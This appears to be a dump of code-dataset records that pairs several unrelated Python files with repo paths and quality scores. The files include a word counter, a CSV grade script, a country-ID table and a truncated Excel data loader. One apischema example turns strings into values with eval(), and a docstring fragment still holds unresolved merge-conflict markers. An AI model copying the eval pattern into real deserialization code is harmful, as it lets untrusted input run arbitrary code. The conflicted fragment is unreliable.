The decorated function is assumed to be a loop method accepting a `num_steps` parameter, as for instance would be called within the `Controller`'s outer train loop. The implementation here assumes that `summary_frequency` is divisible by `steps_per_loop`. The decorated method should accept two arguments, `self` and `num_steps`. Two `tf.function` versions of `train_fn` are created: one inside a summary writer scope with soft device placement enabled (used on steps that require summary writing), and one with no summary writer present and soft device placement disabled (used on all other steps). Args: *args: Arguments to pass through to `tf.function`. **kwargs: Keyword arguments to pass through to `tf.function`. Returns: If the first argument is a callable, returns the decorated callable. Otherwise, returns a decorator. # TODO(dhr): Validate the signature of train_fn? Returns the value of a variable/tensor. Args: x: input variable. Returns: <<<<<<< HEAD A Numpy array. ======= A Numpy array or number. >>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36 | 2.400488 | 2 |
python/word-count/word_count.py | whitepeaony/exercism-python | 0 | 9164 | def count_words(sentence):
sentence = sentence.lower()
words = {}
shit = ',\n:!&@$%^&._'
for s in shit:
sentence = sentence.replace(s, ' ')
for w in sentence.split():
if w.endswith('\''):
w = w[:-1]
if w.startswith('\''):
w = w[1:]
words[w] = words.get(w, 0) + 1
return words
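# Editor's illustrative check (not part of the original exercism solution):
# punctuation listed in `shit` becomes whitespace and wrapping apostrophes are
# stripped, so quoted and unquoted occurrences of a word count together.
if __name__ == "__main__":
    expected = {"joe": 1, "can't": 1, "tell": 1, "between": 1, "large": 2, "and": 1}
    assert count_words("Joe can't tell between 'large' and large.") == expected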
| def count_words(sentence):
sentence = sentence.lower()
words = {}
shit = ',\n:!&@$%^&._'
for s in shit:
sentence = sentence.replace(s, ' ')
for w in sentence.split():
if w.endswith('\''):
w = w[:-1]
if w.startswith('\''):
w = w[1:]
words[w] = words.get(w, 0) + 1
return words
| none | 1 | 3.627309 | 4 |
|
examples/multiple_deserializers.py | klauer/apischema | 0 | 9165 | from dataclasses import dataclass
from apischema import deserialize, deserializer
from apischema.json_schema import deserialization_schema
@dataclass
class Expression:
value: int
@deserializer
def evaluate_expression(expr: str) -> Expression:
return Expression(int(eval(expr)))
# Could be shorten into deserializer(Expression), because class is callable too
@deserializer
def expression_from_value(value: int) -> Expression:
return Expression(value)
assert deserialization_schema(Expression) == {
"$schema": "http://json-schema.org/draft/2019-09/schema#",
"type": ["string", "integer"],
}
assert deserialize(Expression, 0) == deserialize(Expression, "1 - 1") == Expression(0)
| from dataclasses import dataclass
from apischema import deserialize, deserializer
from apischema.json_schema import deserialization_schema
@dataclass
class Expression:
value: int
@deserializer
def evaluate_expression(expr: str) -> Expression:
return Expression(int(eval(expr)))
# Could be shorten into deserializer(Expression), because class is callable too
@deserializer
def expression_from_value(value: int) -> Expression:
return Expression(value)
assert deserialization_schema(Expression) == {
"$schema": "http://json-schema.org/draft/2019-09/schema#",
"type": ["string", "integer"],
}
assert deserialize(Expression, 0) == deserialize(Expression, "1 - 1") == Expression(0)
| en | 0.834069 | # Could be shorten into deserializer(Expression), because class is callable too #", | 3.194712 | 3 |
ficheros/CSV/prueba csv (lm)/alumnos.py | txtbits/daw-python | 0 | 9166 | <filename>ficheros/CSV/prueba csv (lm)/alumnos.py<gh_stars>0
# -*- coding: utf-8 -*-
'''
Created on 02/12/2011
@author: chra
'''
import csv
from operator import itemgetter
# ----- Función media de la notas de los alumnos ----------
def media(alumno):
#devuelve la nota media a partir de un diccionario con datos de un alumno
nota1 = int(alumno['Nota1'])
nota2 = int(alumno.get('Nota2'))
nota3 = int(alumno.get('Nota3'))
return (nota1+nota2+nota3) / 3.
# ----------------------------------------------------------
fin = open('alumnos.csv')
lector = csv.DictReader(fin, delimiter=",") # si no se pone delimiter, coge la coma por defecto // devuelve diccionario
# lector = csv.reader(fin, delimiter=",") <-- Devuelve lista
alumnos = []
for linea in lector:
alumnos.append((linea['Alumno'], media(linea)))
# -------- Ordenar por nombre de alumno -----------
alumnos.sort()
print 'Orden por nombre de alumno'
for al in alumnos:
print "%-10s %6.2f" % al #10 espacios entre cadena (nombre - nota media) y permite 6 digitos, 2 de ellos decimales.
# --------------------------------------------------
# --------- Ordenar por nota -----------------------
print '\nOrden por nota'
alumnos.sort(key=itemgetter(1),reverse=True)
for al in alumnos:
print "%-10s %6.2f" % al
#---------------------------------------------------
# Crea un fichero 'lista_ordenada_notas.csv' y escribe la lista ordenada por notas
fw = open('lista_ordenada_notas.csv', 'w')
csvwriter = csv.writer(fw)
for al in alumnos:
csvwriter.writerow(al)
fw.close() | <filename>ficheros/CSV/prueba csv (lm)/alumnos.py<gh_stars>0
# -*- coding: utf-8 -*-
'''
Created on 02/12/2011
@author: chra
'''
import csv
from operator import itemgetter
# ----- Función media de la notas de los alumnos ----------
def media(alumno):
#devuelve la nota media a partir de un diccionario con datos de un alumno
nota1 = int(alumno['Nota1'])
nota2 = int(alumno.get('Nota2'))
nota3 = int(alumno.get('Nota3'))
return (nota1+nota2+nota3) / 3.
# ----------------------------------------------------------
fin = open('alumnos.csv')
lector = csv.DictReader(fin, delimiter=",") # if delimiter is omitted, the comma is used by default // returns a dictionary
# lector = csv.reader(fin, delimiter=",") <-- Returns a list
alumnos = []
for linea in lector:
alumnos.append((linea['Alumno'], media(linea)))
# -------- Sort by student name -----------
alumnos.sort()
print 'Orden por nombre de alumno'
for al in alumnos:
print "%-10s %6.2f" % al #10 espacios entre cadena (nombre - nota media) y permite 6 digitos, 2 de ellos decimales.
# --------------------------------------------------
# --------- Sort by grade -----------------------
print '\nOrden por nota'
alumnos.sort(key=itemgetter(1),reverse=True)
for al in alumnos:
print "%-10s %6.2f" % al
#---------------------------------------------------
# Creates the file 'lista_ordenada_notas.csv' and writes the list sorted by grade
fw = open('lista_ordenada_notas.csv', 'w')
csvwriter = csv.writer(fw)
for al in alumnos:
csvwriter.writerow(al)
fw.close() | es | 0.62407 | # -*- coding: utf-8 -*- Created on 02/12/2011 @author: chra # ----- Función media de la notas de los alumnos ---------- #devuelve la nota media a partir de un diccionario con datos de un alumno # ---------------------------------------------------------- # si no se pone delimiter, coge la coma por defecto // devuelve diccionario # lector = csv.reader(fin, delimiter=",") <-- Devuelve lista # -------- Ordenar por nombre de alumno ----------- #10 espacios entre cadena (nombre - nota media) y permite 6 digitos, 2 de ellos decimales. # -------------------------------------------------- # --------- Ordenar por nota ----------------------- #--------------------------------------------------- # Crea un fichero 'lista_ordenada_notas.csv' y escribe la lista ordenada por notas | 3.481498 | 3 |
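For comparison, a minimal Python 3 sketch of the same read-average-sort flow; it assumes the same alumnos.csv columns (Alumno, Nota1, Nota2, Nota3) used by the script above.

import csv

with open('alumnos.csv', newline='') as fin:
    rows = list(csv.DictReader(fin))

# (name, average grade) pairs, printed sorted by grade in descending order
alumnos = [(r['Alumno'],
            (int(r['Nota1']) + int(r['Nota2']) + int(r['Nota3'])) / 3) for r in rows]
for nombre, nota in sorted(alumnos, key=lambda t: t[1], reverse=True):
    print(f"{nombre:<10} {nota:6.2f}")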
src/interpreter/functions/math/math.py | incrementals/b-star | 2 | 9167 | <reponame>incrementals/b-star
from src.interpreter.functions.math.add import add
from src.interpreter.functions.math.div import div
from src.interpreter.functions.math.mod import mod
from src.interpreter.functions.math.mul import mul
from src.interpreter.functions.math.pow import pow_func
from src.interpreter.functions.math.sub import sub
def math_func(number, operator: str, by):
operator = operator.strip()
if operator == "+":
return add(number, by)
elif operator == "-":
return sub(number, by)
elif operator == "/":
return div(number, by)
elif operator == "*":
return mul(number, by)
elif operator == "^":
return pow_func(number, by)
elif operator == "%":
return mod(number, by)
else:
raise Exception("unknown operator: " + operator)
| from src.interpreter.functions.math.add import add
from src.interpreter.functions.math.div import div
from src.interpreter.functions.math.mod import mod
from src.interpreter.functions.math.mul import mul
from src.interpreter.functions.math.pow import pow_func
from src.interpreter.functions.math.sub import sub
def math_func(number, operator: str, by):
operator = operator.strip()
if operator == "+":
return add(number, by)
elif operator == "-":
return sub(number, by)
elif operator == "/":
return div(number, by)
elif operator == "*":
return mul(number, by)
elif operator == "^":
return pow_func(number, by)
elif operator == "%":
return mod(number, by)
else:
raise Exception("unknown operator: " + operator) | none | 1 | 3.360351 | 3 |
|
setup.py | monkey2000/pygazetteer | 1 | 9168 | <gh_stars>1-10
from setuptools import setup
setup(name='pygazetteer',
version='0.1.0',
description='Location extractor by looking up gazetteer',
url='https://github.com/monkey2000/pygazetteer',
license='MIT',
packages=['pygazetteer'],
install_requires=[
'pyahocorasick'
],
zip_safe=False,
include_package_data=True)
| from setuptools import setup
setup(name='pygazetteer',
version='0.1.0',
description='Location extractor by looking up gazetteer',
url='https://github.com/monkey2000/pygazetteer',
license='MIT',
packages=['pygazetteer'],
install_requires=[
'pyahocorasick'
],
zip_safe=False,
include_package_data=True) | none | 1 | 1.273243 | 1 |
|
iqoptionapi/country_id.py | mustx1/MYIQ | 3 | 9169 | <gh_stars>1-10
ID = {"Worldwide":0,
"AF": 1,
"AL": 2,
"DZ": 3,
"AD": 5,
"AO": 6,
"AI": 7,
"AG": 9,
"AR": 10,
"AM": 11,
"AW": 12,
"AT": 14,
"AZ": 15,
"BS": 16,
"BH": 17,
"BD": 18,
"BB": 19,
"BY": 20,
"BZ": 22,
"BJ": 23,
"BM": 24,
"BO": 26,
"BA": 27,
"BW": 28,
"BV": 29,
"BR": 30,
"BN": 31,
"BG": 32,
"BF": 33,
"BI": 34,
"KH": 35,
"CM": 36,
"CV": 38,
"KY": 39,
"TD": 41,
"CL": 42,
"CN": 43,
"CC": 45,
"CO": 46,
"KM": 47,
"CG": 48,
"CK": 49,
"CR": 50,
"CI": 51,
"HR": 52,
"CU": 53,
"CY": 54,
"CZ": 55,
"DK": 56,
"DJ": 57,
"DM": 58,
"DO": 59,
"TL": 60,
"EC": 61,
"EG": 62,
"SV": 63,
"EE": 66,
"ET": 67,
"FO": 69,
"FJ": 70,
"FI": 71,
"FR": 72,
"GF": 73,
"PF": 74,
"GA": 75,
"GM": 76,
"GE": 77,
"DE": 78,
"GH": 79,
"GR": 81,
"GD": 83,
"GP": 84,
"GT": 86,
"GN": 87,
"GY": 88,
"HT": 89,
"HN": 90,
"HK": 91,
"HU": 92,
"IS": 93,
"ID": 94,
"IQ": 95,
"IE": 96,
"IT": 97,
"JM": 98,
"JO": 100,
"KZ": 101,
"KE": 102,
"KI": 103,
"KW": 104,
"KG": 105,
"LA": 106,
"LV": 107,
"LB": 108,
"LS": 109,
"LR": 110,
"LY": 111,
"LT": 113,
"LU": 114,
"MO": 115,
"MK": 116,
"MG": 117,
"MW": 118,
"MY": 119,
"MV": 120,
"ML": 121,
"MT": 122,
"MQ": 124,
"MR": 125,
"MU": 126,
"MX": 128,
"FM": 129,
"MD": 130,
"MC": 131,
"MN": 132,
"MA": 134,
"MZ": 135,
"MM": 136,
"NA": 137,
"NP": 139,
"NL": 140,
"AN": 141,
"NC": 142,
"NZ": 143,
"NI": 144,
"NE": 145,
"NG": 146,
"NO": 149,
"OM": 150,
"PK": 151,
"PW": 152,
"PA": 153,
"PG": 154,
"PY": 155,
"PE": 156,
"PH": 157,
"PL": 159,
"PT": 160,
"QA": 162,
"RE": 163,
"RO": 164,
"RW": 166,
"KN": 167,
"LC": 168,
"SA": 171,
"SN": 172,
"SC": 173,
"SG": 175,
"SK": 176,
"SI": 177,
"SO": 179,
"ZA": 180,
"KR": 181,
"ES": 182,
"LK": 183,
"SH": 184,
"SR": 186,
"SZ": 187,
"SE": 188,
"CH": 189,
"TW": 191,
"TJ": 192,
"TZ": 193,
"TH": 194,
"TG": 195,
"TT": 198,
"TN": 199,
"TR": 200,
"TM": 201,
"UG": 203,
"UA": 204,
"AE": 205,
"GB": 206,
"UY": 207,
"UZ": 208,
"VE": 211,
"VN": 212,
"VG": 213,
"YE": 216,
"ZM": 218,
"ZW": 219,
"RS": 220,
"ME": 221,
"IN": 225,
"TC": 234,
"CD": 235,
"GG": 236,
"IM": 237,
"JE": 239,
"CW": 246, }
| ID = {"Worldwide":0,
"AF": 1,
"AL": 2,
"DZ": 3,
"AD": 5,
"AO": 6,
"AI": 7,
"AG": 9,
"AR": 10,
"AM": 11,
"AW": 12,
"AT": 14,
"AZ": 15,
"BS": 16,
"BH": 17,
"BD": 18,
"BB": 19,
"BY": 20,
"BZ": 22,
"BJ": 23,
"BM": 24,
"BO": 26,
"BA": 27,
"BW": 28,
"BV": 29,
"BR": 30,
"BN": 31,
"BG": 32,
"BF": 33,
"BI": 34,
"KH": 35,
"CM": 36,
"CV": 38,
"KY": 39,
"TD": 41,
"CL": 42,
"CN": 43,
"CC": 45,
"CO": 46,
"KM": 47,
"CG": 48,
"CK": 49,
"CR": 50,
"CI": 51,
"HR": 52,
"CU": 53,
"CY": 54,
"CZ": 55,
"DK": 56,
"DJ": 57,
"DM": 58,
"DO": 59,
"TL": 60,
"EC": 61,
"EG": 62,
"SV": 63,
"EE": 66,
"ET": 67,
"FO": 69,
"FJ": 70,
"FI": 71,
"FR": 72,
"GF": 73,
"PF": 74,
"GA": 75,
"GM": 76,
"GE": 77,
"DE": 78,
"GH": 79,
"GR": 81,
"GD": 83,
"GP": 84,
"GT": 86,
"GN": 87,
"GY": 88,
"HT": 89,
"HN": 90,
"HK": 91,
"HU": 92,
"IS": 93,
"ID": 94,
"IQ": 95,
"IE": 96,
"IT": 97,
"JM": 98,
"JO": 100,
"KZ": 101,
"KE": 102,
"KI": 103,
"KW": 104,
"KG": 105,
"LA": 106,
"LV": 107,
"LB": 108,
"LS": 109,
"LR": 110,
"LY": 111,
"LT": 113,
"LU": 114,
"MO": 115,
"MK": 116,
"MG": 117,
"MW": 118,
"MY": 119,
"MV": 120,
"ML": 121,
"MT": 122,
"MQ": 124,
"MR": 125,
"MU": 126,
"MX": 128,
"FM": 129,
"MD": 130,
"MC": 131,
"MN": 132,
"MA": 134,
"MZ": 135,
"MM": 136,
"NA": 137,
"NP": 139,
"NL": 140,
"AN": 141,
"NC": 142,
"NZ": 143,
"NI": 144,
"NE": 145,
"NG": 146,
"NO": 149,
"OM": 150,
"PK": 151,
"PW": 152,
"PA": 153,
"PG": 154,
"PY": 155,
"PE": 156,
"PH": 157,
"PL": 159,
"PT": 160,
"QA": 162,
"RE": 163,
"RO": 164,
"RW": 166,
"KN": 167,
"LC": 168,
"SA": 171,
"SN": 172,
"SC": 173,
"SG": 175,
"SK": 176,
"SI": 177,
"SO": 179,
"ZA": 180,
"KR": 181,
"ES": 182,
"LK": 183,
"SH": 184,
"SR": 186,
"SZ": 187,
"SE": 188,
"CH": 189,
"TW": 191,
"TJ": 192,
"TZ": 193,
"TH": 194,
"TG": 195,
"TT": 198,
"TN": 199,
"TR": 200,
"TM": 201,
"UG": 203,
"UA": 204,
"AE": 205,
"GB": 206,
"UY": 207,
"UZ": 208,
"VE": 211,
"VN": 212,
"VG": 213,
"YE": 216,
"ZM": 218,
"ZW": 219,
"RS": 220,
"ME": 221,
"IN": 225,
"TC": 234,
"CD": 235,
"GG": 236,
"IM": 237,
"JE": 239,
"CW": 246, } | none | 1 | 1.26624 | 1 |
|
pysd/py_backend/external.py | rogersamso/pysd_dev | 0 | 9170 | """
These classes are a collection of the needed tools to read external data.
The External type objects created by these classes are initialized before
the Stateful objects by functions.Model.initialize.
"""
import re
import os
import warnings
import pandas as pd # TODO move to openpyxl
import numpy as np
import xarray as xr
from openpyxl import load_workbook
from . import utils
class Excels():
"""
Class to save the read Excel files and thus avoid double reading
"""
_Excels, _Excels_opyxl = {}, {}
@classmethod
def read(cls, file_name, sheet_name):
"""
Read the Excel file or return the previously read one
"""
if file_name + sheet_name in cls._Excels:
return cls._Excels[file_name + sheet_name]
else:
excel = np.array([
pd.to_numeric(ex, errors='coerce')
for ex in
pd.read_excel(file_name, sheet_name, header=None).values
])
cls._Excels[file_name + sheet_name] = excel
return excel
@classmethod
def read_opyxl(cls, file_name):
"""
Read the Excel file using OpenPyXL or return the previously read one
"""
if file_name in cls._Excels_opyxl:
return cls._Excels_opyxl[file_name]
else:
excel = load_workbook(file_name, read_only=True, data_only=True)
cls._Excels_opyxl[file_name] = excel
return excel
@classmethod
def clean(cls):
"""
Clean the dictionary of read files
"""
cls._Excels, cls._Excels_opyxl = {}, {}
class External(object):
"""
Main class of external objects
Attributes
----------
py_name: str
The python name of the object
missing: str ("warning", "error", "ignore", "keep")
What to do with missing values. If "warning" (default)
shows a warning message and interpolates the values.
If "raise" raises an error. If "ignore" interpolates
the values without showing anything. If "keep" it will keep
the missing values, this option may cause the integration to
fail, but it may be used to check the quality of the data.
file: str
File name from which the data is read.
sheet: str
Sheet name from which the data is read.
"""
missing = "warning"
def __init__(self, py_name):
self.py_name = py_name
self.file = None
self.sheet = None
def __str__(self):
return self.py_name
def _get_data_from_file(self, rows, cols):
"""
Function to read data from excel file using rows and columns
Parameters
----------
rows: list of len 2
first row and last row+1 to be read, starting from 0
cols: list of len 2
first col and last col+1 to be read, starting from 0
Returns
-------
data: pandas.DataFrame, pandas.Series or float
depending on the shape of the requested data
"""
# TODO move to openpyxl to avoid pandas dependency in this file.
ext = os.path.splitext(self.file)[1].lower()
if ext in ['.xls', '.xlsx']:
# read data
data = Excels.read(
self.file,
self.sheet)[rows[0]:rows[1], cols[0]:cols[1]].copy()
shape = data.shape
# if it is a single row remove its dimension
if shape[1] == 1:
data = data[:, 0]
if shape[0] == 1:
data = data[0]
return data
raise NotImplementedError(self.py_name + "\n"
+ "The files with extension "
+ ext + " are not implemented")
def _get_data_from_file_opyxl(self, cellname):
"""
Function to read data from excel file using cell range name
Parameters
----------
cellname: str
the cell range name
Returns
-------
data: numpy.ndarray or float
depending on the shape of the requested data
"""
# read data
excel = Excels.read_opyxl(self.file)
try:
# Get the local id of the sheet
# needed for searching in locals names
# need to lower the sheetnames as Vensim has no case sensitivity
sheetId = [sheetname_wb.lower() for sheetname_wb
in excel.sheetnames].index(self.sheet.lower())
except ValueError:
# Error if it is not able to get the localSheetId
raise ValueError(self.py_name + "\n"
+ "The sheet doesn't exist...\n"
+ self._file_sheet)
try:
# Search for local and global names
cellrange = excel.defined_names.get(cellname, sheetId)\
or excel.defined_names.get(cellname)
coordinates = cellrange.destinations
for sheet, cells in coordinates:
if sheet.lower() == self.sheet.lower():
values = excel[sheet][cells]
try:
return np.array(
[[i.value if not isinstance(i.value, str)
else np.nan for i in j] for j in values],
dtype=float)
except TypeError:
return float(values.value)
raise AttributeError
except (KeyError, AttributeError):
# key error if the cellrange doesn't exist in the file or sheet
raise AttributeError(
self.py_name + "\n"
+ "The cell range name:\t {}\n".format(cellname)
+ "Doesn't exist in:\n" + self._file_sheet
)
def _get_series_data(self, series_across, series_row_or_col, cell, size):
"""
        Function that reads series and data from the excel file for
DATA and LOOKUPS.
Parameters
----------
series_across: "row", "column" or "name"
The way to read series file.
series_row_or_col: int or str
If series_across is "row" the row number where the series data is.
If series_across is "column" the column name where
the series data is.
If series_across is "name" the cell range name where
the series data is.
cell:
If series_across is not "name, the top left cell where
the data table starts.
Else the name of the cell range where the data is.
size:
The size of the 2nd dimension of the data.
Returns
-------
series, data: ndarray (1D), ndarray(1D/2D)
The values of the series and data.
"""
if series_across == "row":
# Horizontal data (dimension values in a row)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series = self._get_data_from_file(
rows=[int(series_row_or_col)-1, int(series_row_or_col)],
cols=[first_col, None])
# read data
data = self._get_data_from_file(
rows=[first_row, first_row + size],
cols=[first_col, None]).transpose()
elif series_across == "column":
# Vertical data (dimension values in a column)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series_col = self._col_to_num(series_row_or_col)
series = self._get_data_from_file(
rows=[first_row, None],
cols=[series_col, series_col+1])
# read data
data = self._get_data_from_file(
rows=[first_row, None],
cols=[first_col, first_col + size])
else:
# get series data
series = self._get_data_from_file_opyxl(series_row_or_col)
if isinstance(series, float):
series = np.array([[series]])
series_shape = series.shape
if series_shape[0] == 1:
# horizontal definition of lookup/time dimension
series = series[0]
transpose = True
elif series_shape[1] == 1:
# vertical definition of lookup/time dimension
series = series[:, 0]
transpose = False
else:
# Error if the lookup/time dimension is 2D
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\tDimentime_missingsion name:"
+ "\t{}\n".format(series_row_or_col)
+ " is a table and not a vector"
)
# get data
data = self._get_data_from_file_opyxl(cell)
if isinstance(data, float):
data = np.array([[data]])
if transpose:
# transpose for horizontal definition of dimension
data = data.transpose()
if data.shape[0] != len(series):
raise ValueError(
self.py_name + "\n"
+ "Dimension and data given in:\n"
+ self._file_sheet
+ "\tDimension name:\t{}\n".format(series_row_or_col)
+ "\tData name:\t{}\n".format(cell)
+ " don't have the same length in the 1st dimension"
)
if data.shape[1] != size:
# Given coordinates length is different than
            # the length of the 2nd dimension
raise ValueError(
self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same size as the given coordinates"
)
if data.shape[1] == 1:
# remove second dimension of data if its shape is (N, 1)
data = data[:, 0]
return series, data
def _resolve_file(self, root=None, possible_ext=None):
possible_ext = possible_ext or\
['', '.xls', '.xlsx', '.odt', '.txt', '.tab']
if self.file[0] == '?':
self.file = os.path.join(root, self.file[1:])
if not os.path.isfile(self.file):
for ext in possible_ext:
if os.path.isfile(self.file + ext):
self.file = self.file + ext
return
# raise FileNotFoundError(self.file)
# python2 compatibility
raise IOError("File Not Found: " + self.file)
else:
return
def _initialize_data(self, element_type):
"""
Initialize one element of DATA or LOOKUPS
Parameters
----------
element_type: str
"lookup" for LOOKUPS, "data" for data.
Returns
-------
data: xarray.DataArray
Dataarray with the time or interpolation dimension
as first dimension.
"""
self._resolve_file(root=self.root)
series_across = self._series_selector(self.x_row_or_col, self.cell)
size = utils.compute_shape(self.coords, reshape_len=1,
py_name=self.py_name)[0]
series, data = self._get_series_data(
series_across=series_across,
series_row_or_col=self.x_row_or_col,
cell=self.cell, size=size
)
# remove nan or missing values from dimension
if series_across != "name":
# Remove last nans only if the method is to read by row or col
i = 0
try:
while np.isnan(series[i-1]):
i -= 1
except IndexError:
# series has len 0
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " has length 0"
)
if i != 0:
series = series[:i]
data = data[:i]
# warning/error if missing data in the series
if any(np.isnan(series)) and self.missing != "keep":
valid_values = ~np.isnan(series)
series = series[valid_values]
data = data[valid_values]
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " the corresponding data value(s) to the "
+ "missing/non-valid value(s) will be ignored\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
)
# Check if the lookup/time dimension is strictly monotonous
if np.any(np.diff(series) <= 0) and self.missing != "keep":
raise ValueError(self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " is not strictly monotonous")
# Check for missing values in data
if np.any(np.isnan(data)) and self.missing != "keep":
if series_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
# Fill missing values with the chosen interpolation method
# what Vensim does during running for DATA
warnings.warn(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
+ " the corresponding value will be filled "
+ "with the interpolation method of the object.\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# fill values
self._fill_missing(series, data)
reshape_dims = tuple([len(series)] + utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
if element_type == "lookup":
dim_name = "lookup_dim"
else:
dim_name = "time"
data = xr.DataArray(
data=data,
coords={dim_name: series, **self.coords},
dims=[dim_name] + list(self.coords)
)
return data
def _fill_missing(self, series, data):
"""
Fills missing values in excel read data. Mutates the values in data.
Parameters
----------
series:
the time series without missing values
data:
the data with missing values
Returns
-------
None
"""
# if data is 2dims we need to interpolate
datanan = np.isnan(data)
if len(data.shape) == 1:
data[datanan] = self._interpolate_missing(
series[datanan],
series[~datanan],
data[~datanan])
else:
for i, nanlist in enumerate(list(datanan.transpose())):
data[nanlist, i] = self._interpolate_missing(
series[nanlist],
series[~nanlist],
data[~nanlist][:, i])
def _interpolate_missing(self, x, xr, yr):
"""
Interpolates a list of missing values from _fill_missing
Parameters
----------
x:
list of missing values interpolate
xr:
non-missing x values
yr:
non-missing y values
Returns
-------
y:
Result after interpolating x with self.interp method
"""
y = np.empty_like(x, dtype=float)
for i, value in enumerate(x):
if self.interp == "raw":
y[i] = np.nan
elif value >= xr[-1]:
y[i] = yr[-1]
elif value <= xr[0]:
y[i] = yr[0]
elif self.interp == 'look forward':
y[i] = yr[xr >= value][0]
elif self.interp == 'hold backward':
y[i] = yr[xr <= value][-1]
else:
y[i] = np.interp(value, xr, yr)
return y
@property
def _file_sheet(self):
"""
Returns file and sheet name in a string
"""
return "\tFile name:\t{}\n".format(self.file)\
+ "\tSheet name:\t{}\n".format(self.sheet)
@staticmethod
def _col_to_num(col):
"""
Transforms the column name to int
Parameters
----------
col: str
Column name
Returns
-------
int
Column number
"""
if len(col) == 1:
return ord(col.upper()) - ord('A')
elif len(col) == 2:
left = ord(col[0].upper()) - ord('A') + 1
right = ord(col[1].upper()) - ord('A')
return left * (ord('Z')-ord('A')+1) + right
else:
left = ord(col[0].upper()) - ord('A') + 1
center = ord(col[1].upper()) - ord('A') + 1
right = ord(col[2].upper()) - ord('A')
return left * ((ord('Z')-ord('A')+1)**2)\
+ center * (ord('Z')-ord('A')+1)\
+ right
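    # e.g. _col_to_num("A") -> 0, _col_to_num("Z") -> 25, _col_to_num("AA") -> 26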
def _split_excel_cell(self, cell):
"""
Splits a cell value given in a string.
Returns None for non-valid cell formats.
Parameters
----------
cell: str
Cell like string, such as "A1", "b16", "AC19"...
If it is not a cell like string will return None.
Returns
-------
row number, column number: int, int
If the cell input is valid. Both numbers are given in Python
enumeration, i.e., first row and first column are 0.
"""
split = re.findall(r'\d+|\D+', cell)
try:
# check that we only have two values [column, row]
assert len(split) == 2
# check that the column name has no special characters
assert not re.compile('[^a-zA-Z]+').search(split[0])
# check that row number is not 0
assert int(split[1]) != 0
# the column name has as maximum 3 letters
assert len(split[0]) <= 3
return int(split[1])-1, self._col_to_num(split[0])
except AssertionError:
return
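    # e.g. _split_excel_cell("B3") -> (2, 1); _split_excel_cell("3B") -> None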
@staticmethod
def _reshape(data, dims):
"""
        Reshapes a pandas.DataFrame, pandas.Series, xarray.DataArray
or np.ndarray in the given dimensions.
Parameters
----------
data: xarray.DataArray/numpy.ndarray
Data to be reshaped
dims: tuple
The dimensions to reshape.
Returns
-------
numpy.ndarray
reshaped array
"""
try:
data = data.values
except AttributeError:
pass
return data.reshape(dims)
def _series_selector(self, x_row_or_col, cell):
"""
        Selects whether series data (DATA/LOOKUPS) should be read by columns,
rows or cellrange name.
Based on the input format of x_row_or_col and cell.
The format of the 2 variables must be consistent.
Parameters
----------
x_row_or_col: str
String of a number if series is given in a row, letter if series is
given in a column or name if the series is given by cellrange name.
cell: str
            Cell identifier, such as "A1", or name if the data is given
by cellrange name.
Returns
-------
series_across: str
"row" if series is given in a row
"column" if series is given in a column
"name" if series and data are given by range name
"""
try:
# if x_row_or_col is numeric the series must be a row
int(x_row_or_col)
return "row"
except ValueError:
if self._split_excel_cell(cell):
                # if the cell can be split, the format is
                # "A1"-like and the series must be a column
return "column"
else:
return "name"
class ExtData(External):
"""
Class for Vensim GET XLS DATA/GET DIRECT DATA
"""
def __init__(self, file_name, sheet, time_row_or_col, cell,
interp, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.time_row_or_cols = [time_row_or_col]
self.cells = [cell]
self.coordss = [coords]
self.root = root
self.interp = interp
# check if the interpolation method is valid
if not interp:
self.interp = "interpolate"
if self.interp not in ["interpolate", "raw",
"look forward", "hold backward"]:
raise ValueError(self.py_name + "\n"
+ " The interpolation method (interp) must be "
+ "'raw', 'interpolate', "
+ "'look forward' or 'hold backward")
def add(self, file_name, sheet, time_row_or_col, cell,
interp, coords):
"""
        Add the information needed to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.time_row_or_cols.append(time_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if not interp:
interp = "interpolate"
if interp != self.interp:
raise ValueError(self.py_name + "\n"
+ "Error matching interpolation method with "
+ "previously defined one")
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.time_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("data"))
self.data = utils.xrmerge(data)
def __call__(self, time):
if time in self.data['time'].values:
outdata = self.data.sel(time=time)
elif self.interp == "raw":
return np.nan
elif time > self.data['time'].values[-1]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the time")
outdata = self.data[-1]
elif time < self.data['time'].values[0]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the time")
outdata = self.data[0]
elif self.interp == "interpolate":
outdata = self.data.interp(time=time)
elif self.interp == 'look forward':
outdata = self.data.sel(time=time, method="backfill")
elif self.interp == 'hold backward':
